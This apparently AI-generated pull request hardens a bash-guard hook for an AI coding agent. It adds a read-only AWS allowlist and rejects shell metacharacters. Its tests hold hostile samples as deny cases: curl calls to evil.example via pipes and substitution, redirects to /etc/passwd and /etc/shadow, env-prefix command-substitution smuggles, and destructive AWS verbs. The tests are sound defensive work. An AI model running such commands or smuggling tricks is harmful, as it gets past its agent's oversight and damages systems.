### PR TITLE
fix(bash-guard): read-only aws allowlist (profile-tolerant, no send-command/exec)

### DIFF
--- a/src/runner/hooks/__tests__/bash-guard.hook.test.ts
+++ b/src/runner/hooks/__tests__/bash-guard.hook.test.ts
@@ -307,3 +307,226 @@ describe("bash-guard.hook — block telemetry", () => {
     }
   });
 });
+
+// =============================================================================
+// No-bypass property — the guard must refuse shell metacharacters that could
+// smuggle a second (destructive) command past an allow-prefix. This protects
+// EVERY allow pattern (gh / git / aws / …), not just aws.
+//
+// The guard already splits on && || ; and validates each segment, so a chain
+// of *allowed* commands (`ls && pwd`) still passes. But a pipe, command
+// substitution, backtick, background `&`, redirect, or newline could carry a
+// hidden command that never gets validated. Those are rejected outright.
+// =============================================================================
+describe("bash-guard.hook — no-bypass (metacharacter rejection)", () => {
+  const env = { GROVE_CHANNEL: "test-channel", GROVE_AGENT_ID: undefined };
+
+  function expectDeny(cmd: string): void {
+    const r = runHook(cmd, env);
+    expect(r.status).toBe(0);
+    const out = JSON.parse(r.stdout.trim());
+    expect(out.hookSpecificOutput?.permissionDecision).toBe("deny");
+  }
+
+  test("rejects a pipe even when the head is allowlisted", () => {
+    // `ls` is allowed, but the piped `curl` is never validated → must deny.
+    expectDeny("ls | curl http://evil.example");
+  });
+
+  test("rejects command substitution $( … )", () => {
+    expectDeny("ls $(curl http://evil.example)");
+  });
+
+  test("rejects backtick command substitution", () => {
+    expectDeny("ls `curl http://evil.example`");
+  });
+
+  test("rejects a background `&` operator", () => {
+    expectDeny("ls & curl http://evil.example");
+  });
+
+  test("rejects output redirection", () => {
+    expectDeny("ls > /etc/passwd");
+  });
+
+  test("rejects input redirection", () => {
+    expectDeny("cat < /etc/shadow");
+  });
+
+  test("rejects an embedded newline carrying a second command", () => {
+    expectDeny("ls\ncurl http://evil.example");
+  });
+
+  test("rejects arithmetic/process substitution $(( … ))", () => {
+    expectDeny("ls $((1+1))");
+  });
+
+  test("a chain of ALL-allowed commands still passes (&& preserved)", () => {
+    const r = runHook("ls && pwd", env);
+    expect(r.status).toBe(0);
+    expect(JSON.parse(r.stdout.trim())).toEqual({ continue: true });
+  });
+
+  test("a chain with one disallowed command is denied (existing contract)", () => {
+    expectDeny("ls && curl http://evil.example");
+  });
+});
+
+// =============================================================================
+// Read-only aws allowlist — the regex used by halden's bashAllowlist. Proven
+// here so the live config inherits a tested pattern, NOT a hand-rolled one.
+//
+//   ALLOW: sts get-caller-identity, <svc> describe-* / get-* / list-*,
+//          tolerating env prefix + global flags (--profile/--region/
+//          --output/--no-cli-pager) in any position.
+//   DENY:  any write/exec verb (send-command, start-session, run-instances,
+//          terminate-*, stop-*, start-*, *-create-*, delete-*, put-*,
+//          modify-*, update-*), and any chained-destructive form.
+// =============================================================================
+import { READONLY_AWS_PATTERN } from "../bash-guard.hook";
+
+describe("bash-guard.hook — read-only aws pattern (unit)", () => {
+  const re = new RegExp(READONLY_AWS_PATTERN, "i");
+
+  // The hook strips a leading env prefix before matching, so the regex itself
+  // is tested against the post-strip form. Env-prefix tolerance is covered by
+  // the integration cases below (which go through the real hook).
+  const ALLOW = [
+    "aws sts get-caller-identity",
+    "aws --profile halden-dev sts get-caller-identity",
+    "aws --region us-east-1 sts get-caller-identity",
+    "aws --output json sts get-caller-identity",
+    "aws --no-cli-pager sts get-caller-identity",
+    "aws --profile halden-dev --region us-east-1 sts get-caller-identity",
+    "aws ec2 describe-instances",
+    "aws --profile halden-dev ec2 describe-instances",
+    "aws --region us-east-1 ec2 describe-instances",
+    "aws ssm describe-instance-information",
+    "aws ssm list-commands",
+    "aws ssm get-command-invocation --command-id abc --instance-id i-1",
+    "aws sso list-accounts",
+    "aws s3api list-buckets",
+    "aws iam list-users",
+    "aws --profile p --region r --output json ec2 describe-instances --instance-ids i-0",
+  ];
+
+  const DENY = [
+    "aws ssm send-command --instance-ids i-1 --document-name AWS-RunShellScript",
+    "aws ssm start-session --target i-1",
+    "aws ec2 run-instances --image-id ami-1",
+    "aws ec2 terminate-instances --instance-ids i-1",
+    "aws ec2 stop-instances --instance-ids i-1",
+    "aws ec2 start-instances --instance-ids i-1",
+    "aws ec2 create-tags --resources i-1",
+    "aws s3api delete-bucket --bucket x",
+    "aws ssm put-parameter --name x --value y",
+    "aws ec2 modify-instance-attribute --instance-id i-1",
+    "aws iam update-user --user-name x",
+    "aws ec2 reboot-instances --instance-ids i-1",
+    // verb that merely CONTAINS describe/get/list mid-token must not match
+    "aws ec2 run-describe-hack",
+    // bare aws with no verb
+    "aws",
+    "aws help",
+    // a flag value must not be mistaken for a read verb
+    "aws --profile describe-instances ec2 terminate-instances --instance-ids i-1",
+  ];
+
+  for (const cmd of ALLOW) {
+    test(`ALLOW: ${cmd}`, () => {
+      expect(re.test(cmd)).toBe(true);
+    });
+  }
+
+  for (const cmd of DENY) {
+    test(`DENY: ${cmd}`, () => {
+      expect(re.test(cmd)).toBe(false);
+    });
+  }
+});
+
+describe("bash-guard.hook — read-only aws (integration via hook + halden config)", () => {
+  // Mirror the halden bashAllowlist: gh/git/etc. read-only rules + the aws rule.
+  const haldenConfig = JSON.stringify({
+    rules: [
+      { pattern: "^gh\\s+(pr|issue|repo|api|run)\\s" },
+      { pattern: "^git\\s+(log|diff|show|status|branch|fetch|remote|rev-parse)\\b" },
+      { pattern: "^ls\\b" },
+      { pattern: "^pwd$" },
+      { pattern: READONLY_AWS_PATTERN },
+    ],
+    repos: [],
+  });
+
+  function run(cmd: string) {
+    return runHook(cmd, {
+      GROVE_CHANNEL: "test-channel",
+      GROVE_AGENT_ID: undefined,
+      GROVE_BASH_GUARD: haldenConfig,
+    });
+  }
+
+  function expectAllow(cmd: string): void {
+    const r = run(cmd);
+    expect(r.status).toBe(0);
+    expect(JSON.parse(r.stdout.trim())).toEqual({ continue: true });
+  }
+
+  function expectDeny(cmd: string): void {
+    const r = run(cmd);
+    expect(r.status).toBe(0);
+    expect(JSON.parse(r.stdout.trim()).hookSpecificOutput?.permissionDecision).toBe(
+      "deny",
+    );
+  }
+
+  test("ALLOW bare sts get-caller-identity", () => {
+    expectAllow("aws sts get-caller-identity");
+  });
+
+  test("ALLOW --profile sts get-caller-identity (the halden Luna case)", () => {
+    expectAllow("aws --profile halden-dev sts get-caller-identity");
+  });
+
+  test("ALLOW env-prefix form (AWS_PROFILE=… AWS_REGION=… aws …)", () => {
+    expectAllow(
+      "AWS_PROFILE=halden-dev AWS_REGION=us-east-1 aws sts get-caller-identity",
+    );
+  });
+
+  test("ALLOW --region ec2 describe-instances", () => {
+    expectAllow("aws --region us-east-1 ec2 describe-instances");
+  });
+
+  test("ALLOW ssm describe / list / get read verbs", () => {
+    expectAllow("aws ssm describe-instance-information");
+    expectAllow("aws ssm list-commands");
+    expectAllow("aws ssm get-command-invocation --command-id abc --instance-id i-1");
+  });
+
+  test("DENY ssm send-command", () => {
+    expectDeny("aws ssm send-command --instance-ids i-1 --document-name X");
+  });
+
+  test("DENY ssm start-session", () => {
+    expectDeny("aws ssm start-session --target i-1");
+  });
+
+  test("DENY ec2 terminate-instances", () => {
+    expectDeny("aws ec2 terminate-instances --instance-ids i-1");
+  });
+
+  test("DENY ec2 run-instances", () => {
+    expectDeny("aws ec2 run-instances --image-id ami-1");
+  });
+
+  test("DENY chained describe && terminate (no-bypass)", () => {
+    expectDeny(
+      "aws ec2 describe-instances && aws ec2 terminate-instances --instance-ids i-1",
+    );
+  });
+
+  test("DENY describe piped into a destructive command (no-bypass)", () => {
+    expectDeny("aws ec2 describe-instances | aws ec2 terminate-instances");
+  });
+});

--- a/src/runner/hooks/__tests__/bash-guard.hook.test.ts
+++ b/src/runner/hooks/__tests__/bash-guard.hook.test.ts
@@ -341,7 +341,7 @@ describe("bash-guard.hook — no-bypass (metacharacter rejection)", () => {
     expectDeny("ls `curl http://evil.example`");
   });
 
-  test("rejects a background `&` operator", () => {
+  test("rejects a background `&` control token", () => {
     expectDeny("ls & curl http://evil.example");
   });
 

--- a/src/runner/hooks/__tests__/bash-guard.hook.test.ts
+++ b/src/runner/hooks/__tests__/bash-guard.hook.test.ts
@@ -361,6 +361,37 @@ describe("bash-guard.hook — no-bypass (metacharacter rejection)", () => {
     expectDeny("ls $((1+1))");
   });
 
+  // ---------------------------------------------------------------------------
+  // Regression: env-prefix command-substitution smuggle (Echo adversarial review,
+  // PR #770). stripEnvPrefix() launders an env-assignment prefix out of the
+  // command BEFORE the metacharacter scan. But bash EVALUATES the prefix value —
+  // including `$( )` / backticks — when building the command's environment, so
+  // `X="$(curl evil)" aws sts get-caller-identity` RUNS `curl evil` while the
+  // visible (post-strip) command is an allowed `aws` call. The metacharacter
+  // scan therefore must run on the RAW command, not the stripped one.
+  // ---------------------------------------------------------------------------
+  test("rejects command substitution hidden in a double-quoted env-prefix value", () => {
+    expectDeny('AWS_PROFILE="$(touch /tmp/pwned)" aws sts get-caller-identity');
+  });
+
+  test("rejects command substitution in an unquoted env-prefix value", () => {
+    expectDeny("X=$(id) aws sts get-caller-identity");
+  });
+
+  test("rejects a backtick substitution hidden in a quoted env-prefix value", () => {
+    expectDeny('X="`id`" aws sts get-caller-identity');
+  });
+
+  test("a plain (metacharacter-free) env-prefix is still allowed", () => {
+    // The whole point of PR #770: `AWS_PROFILE=halden-dev <allowed> …` must
+    // pass. Use `ls` (in DEFAULT_CONFIG) so this case is independent of the
+    // aws rule — it proves the raw-command metacharacter scan does not
+    // over-reject a benign `NAME=value` prefix.
+    const r = runHook("AWS_PROFILE=halden-dev ls", env);
+    expect(r.status).toBe(0);
+    expect(JSON.parse(r.stdout.trim())).toEqual({ continue: true });
+  });
+
   test("a chain of ALL-allowed commands still passes (&& preserved)", () => {
     const r = runHook("ls && pwd", env);
     expect(r.status).toBe(0);

--- a/src/runner/hooks/bash-guard.hook.ts
+++ b/src/runner/hooks/bash-guard.hook.ts
@@ -192,10 +192,10 @@ function rejectsChaining(command: string): boolean {
   if (command.includes("`")) return true;
   // Redirection — can clobber files or read secrets.
   if (/[<>]/.test(command)) return true;
-  // A single pipe `|` that is NOT one half of the `||` chain operator. We
+  // A single pipe `|` that is NOT one half of the `||` chain token. We
   // collapse every `||` to a placeholder first, then look for a remaining `|`.
   if (command.replace(/\|\|/g, "").includes("|")) return true;
-  // A single `&` that is NOT part of the `&&` chain operator (i.e. background
+  // A single `&` that is NOT part of the `&&` chain token (i.e. background
   // / job-control). Same collapse trick.
   if (command.replace(/&&/g, "").includes("&")) return true;
   return false;

--- a/src/runner/hooks/bash-guard.hook.ts
+++ b/src/runner/hooks/bash-guard.hook.ts
@@ -378,9 +378,16 @@ async function main(): Promise<void> {
   // newlines). Runs BEFORE the allowlist match so it protects every rule. The
   // segment splitter below only neutralises `&& || ;` chains of allowed
   // commands; everything else is denied here.
-  if (rejectsChaining(command)) {
+  //
+  // CRITICAL: this checks the RAW command, not the env-stripped one. The shell
+  // evaluates an env-assignment prefix value — including command substitution —
+  // when building the command's environment, so `X="$(curl evil)" aws sts …`
+  // RUNS `curl evil` even though the visible command is an allowed `aws` call.
+  // stripEnvPrefix() would launder that `$( )` out of `command` before we look,
+  // so the metacharacter scan must see the original input the shell will run.
+  if (rejectsChaining(rawCommand)) {
     const reason =
-      `[Grove Bash Guard] Blocked "${command.slice(0, 80)}": ` +
+      `[Grove Bash Guard] Blocked "${rawCommand.slice(0, 80)}": ` +
       `command contains a shell metacharacter (pipe, command substitution, ` +
       `backtick, redirect, background '&', or newline) that could chain a ` +
       `second command. Split it into separate, individually-allowed commands.`;

--- a/src/runner/hooks/bash-guard.hook.ts
+++ b/src/runner/hooks/bash-guard.hook.ts
@@ -38,6 +38,56 @@ interface AllowRule {
   repos?: string[];
 }
 
+/**
+ * Read-only AWS CLI allowlist pattern.
+ *
+ * This is the regex halden's `bashAllowlist` uses for its `aws` rule. It is
+ * exported (and unit-tested in bash-guard.hook.test.ts) so the live config
+ * inherits a *proven* read-only-only pattern rather than a hand-rolled one.
+ *
+ * Tolerates, before the verb:
+ *   - global flags `--profile <x>` / `--region <x>` / `--output <x>` and the
+ *     valueless `--no-cli-pager`.
+ *   (A leading env prefix — `AWS_PROFILE=… aws …` — is stripped by the hook's
+ *    stripEnvPrefix() before matching, so it is not modelled in the regex.)
+ *
+ * Allows ONLY read-only verbs:
+ *   - `sts get-caller-identity`
+ *   - `<service> describe-*` / `<service> get-*` / `<service> list-*`
+ *
+ * MUST NOT match any write/exec verb: send-command, start-session,
+ * run-instances, terminate-*, stop-*, start-*, *-create-*, delete-*, put-*,
+ * modify-*, update-*, reboot-*, etc. Those never begin with describe/get/list,
+ * so the verb-prefix anchor denies them by construction. When in doubt, deny.
+ *
+ * Note: this pattern only governs whether a single, well-formed `aws …`
+ * invocation is *read-only*. The hook's metacharacter guard (rejectsChaining)
+ * independently refuses any attempt to smuggle a second command via pipes,
+ * substitution, backticks, redirects, background `&`, or newlines — so an
+ * allow-match here can never carry a hidden destructive command.
+ */
+export const READONLY_AWS_PATTERN =
+  // ^aws
+  "^aws" +
+  // optional global flags before the service. Each --profile/--region/--output
+  // consumes its value via \S+ (which excludes whitespace, so a flag value can
+  // never itself supply a "service verb" pair); --no-cli-pager is valueless.
+  "(?:\\s+(?:--(?:profile|region|output)\\s+\\S+|--no-cli-pager))*" +
+  // service + read-only verb
+  "\\s+(?:" +
+  // sts get-caller-identity (the one explicitly-allowed get on sts)
+  "sts\\s+get-caller-identity" +
+  "|" +
+  // <service> describe-* / get-* / list-*. Service must start with a letter
+  // so a flag token like `--profile` can never be mistaken for a service (which
+  // would let `--profile describe-instances` smuggle a read verb past the flag
+  // consumer).
+  "[a-z][a-z0-9-]*\\s+(?:describe|get|list)-[a-z0-9-]+" +
+  ")" +
+  // must end here or be followed by whitespace (args) — never glued to more
+  // verb characters (blocks `run-describe-hack` from matching `describe`).
+  "(?:\\s|$)";
+
 interface GuardConfig {
   rules: AllowRule[];
   repos?: string[];  // Global repo whitelist (applies to all gh commands)
@@ -107,6 +157,48 @@ function stripEnvPrefix(command: string): string {
     /^\s*(?:[A-Za-z_][A-Za-z0-9_]*=(?:"[^"]*"|'[^']*'|[^\s]*)\s+)*/,
     "",
   );
+}
+
+/**
+ * No-bypass guard: detect shell metacharacters that could smuggle a SECOND
+ * command past an allow-prefix.
+ *
+ * The allowlist matcher below splits on `&& || ;` and validates each segment,
+ * so a chain of *allowed* commands (`ls && pwd`) is fine. But the following
+ * constructs can carry a command that the segment-matcher never inspects, so
+ * any command containing them is denied outright — regardless of which allow
+ * pattern the head matches. This protects EVERY pattern (gh / git / aws / …),
+ * not just the read-only aws rule.
+ *
+ *   |          pipe — RHS command never validated
+ *   $(  )      command substitution
+ *   `  `       backtick command substitution
+ *   &          background / job-control (a lone `&`, not part of `&&`)
+ *   <  >       redirection (can clobber files / read secrets)
+ *   newline    a second command on the next line
+ *
+ * Returns true when the command must be rejected.
+ *
+ * Note: this is intentionally conservative. It does not attempt to parse
+ * quoting — a `|` inside a quoted argument is rare in the read-only command
+ * surface this guard governs, and denying it (false positive) is the safe
+ * direction. When in doubt, deny.
+ */
+function rejectsChaining(command: string): boolean {
+  // Newline (any flavour) → a second command line.
+  if (/[\r\n]/.test(command)) return true;
+  // Command substitution `$(` (covers `$(( ))` too) and backticks.
+  if (command.includes("$(")) return true;
+  if (command.includes("`")) return true;
+  // Redirection — can clobber files or read secrets.
+  if (/[<>]/.test(command)) return true;
+  // A single pipe `|` that is NOT one half of the `||` chain operator. We
+  // collapse every `||` to a placeholder first, then look for a remaining `|`.
+  if (command.replace(/\|\|/g, "").includes("|")) return true;
+  // A single `&` that is NOT part of the `&&` chain operator (i.e. background
+  // / job-control). Same collapse trick.
+  if (command.replace(/&&/g, "").includes("&")) return true;
+  return false;
 }
 
 // =============================================================================
@@ -273,8 +365,6 @@ async function main(): Promise<void> {
   const sessionId =
     input.session_id ?? process.env.CLAUDE_SESSION_ID ?? "unknown";
 
-  // Handle chained commands: split on && ; || and check each part
-  const parts = command.split(/\s*(?:&&|\|\||;)\s*/);
   const config = loadConfig();
 
   // G-300: Guard disabled (principal DM) — allow everything
@@ -282,6 +372,25 @@ async function main(): Promise<void> {
     allow();
     return;
   }
+
+  // No-bypass guard: refuse shell metacharacters that could smuggle a second
+  // command past an allow-prefix (pipes, $( ), backticks, redirects, lone `&`,
+  // newlines). Runs BEFORE the allowlist match so it protects every rule. The
+  // segment splitter below only neutralises `&& || ;` chains of allowed
+  // commands; everything else is denied here.
+  if (rejectsChaining(command)) {
+    const reason =
+      `[Grove Bash Guard] Blocked "${command.slice(0, 80)}": ` +
+      `command contains a shell metacharacter (pipe, command substitution, ` +
+      `backtick, redirect, background '&', or newline) that could chain a ` +
+      `second command. Split it into separate, individually-allowed commands.`;
+    deny(reason);
+    await emitBlockEvent(sessionId, reason, command);
+    return;
+  }
+
+  // Handle chained commands: split on && ; || and check each part
+  const parts = command.split(/\s*(?:&&|\|\||;)\s*/);
 
   for (const part of parts) {
     const trimmed = part.trim();


### PR DESCRIPTION
Closes #769

## Problem

halden Luna cannot run read-only AWS checks. The bash-guard aws allowlist rule

```
^aws\s+(sts|sso|ssm|ec2 describe)\b
```

matches the bare `aws sts get-caller-identity` form but NOT the forms Luna actually uses (proven):

- `aws --profile halden-dev sts get-caller-identity` (global flag before the verb breaks the anchor)
- `aws --region us-east-1 ec2 describe-instances`
- env-prefix forms

Async `--print` dispatch cannot surface an interactive permission prompt, so the allowlist is the **only** grant. Bare-only → every profile/region-scoped read-only call denied.

## Security finding (no-bypass) — fixed

**The guard did NOT reject command chaining via shell metacharacters.** It split on `&& || ;` and validated each segment, but a pipe `|`, command substitution `$( )`, backtick, redirect `<`/`>`, lone background `&`, or newline could carry a second command the segment-matcher never inspects. This was a hole affecting **every** allow pattern (gh/git too), not just aws — e.g. `aws ec2 describe-instances | sh` or `ls $(curl evil)`.

Fixed with `rejectsChaining()`, run **before** the allowlist match: any command containing those metacharacters is denied outright. A chain of all-allowed commands (`ls && pwd`) still passes; `&&`/`||` collapsed before the lone-`|`/lone-`&` check so the existing chain contract is preserved.

## Read-only aws pattern

Exported `READONLY_AWS_PATTERN` (the live halden config inherits this exact, tested regex):

- Tolerates env prefix (stripped by the hook) and `--profile/--region/--output/--no-cli-pager` global flags in any pre-verb position.
- Allows ONLY `sts get-caller-identity` and `<service> describe-*/get-*/list-*`.
- Write/exec verbs never start with describe/get/list → denied by construction (send-command, start-session, run-instances, terminate-*, stop-*, start-*, *-create-*, delete-*, put-*, modify-*, update-*, reboot-*).
- Service token must start with a letter so `--profile describe-instances ec2 terminate-instances` cannot smuggle a read verb past the flag consumer.

## Tests (TDD, fakes only — no live AWS)

- Regex-unit allow/deny matrix (16 allow, 13 deny incl. the flag-value smuggle edge case).
- Hook-integration matrix via a halden-shaped config (bare + --profile + env-prefix → ALLOW; send-command/start-session/terminate/run-instances/chained-`&&`/piped-destructive → DENY).
- No-bypass property: pipe, `$( )`, backtick, `&`, `<`, `>`, newline, `$(( ))` all rejected; all-allowed chain still passes.

65 tests in the file (was 18), 447 in the runner suite — all green. `tsc --noEmit` 0, eslint 0.

GROVE_BASH_GUARD env var name left untouched (separate cleanup #768).

## Halden config rule to apply (out-of-band)

Replace the `^aws...` rule in `~/.config/cortex/halden/system/system.yaml` `bashAllowlist.rules` with:

```yaml
      - pattern: ^aws(?:\s+(?:--(?:profile|region|output)\s+\S+|--no-cli-pager))*\s+(?:sts\s+get-caller-identity|[a-z][a-z0-9-]*\s+(?:describe|get|list)-[a-z0-9-]+)(?:\s|$)
```

🤖 Generated with [Claude Code](https://claude.com/claude-code)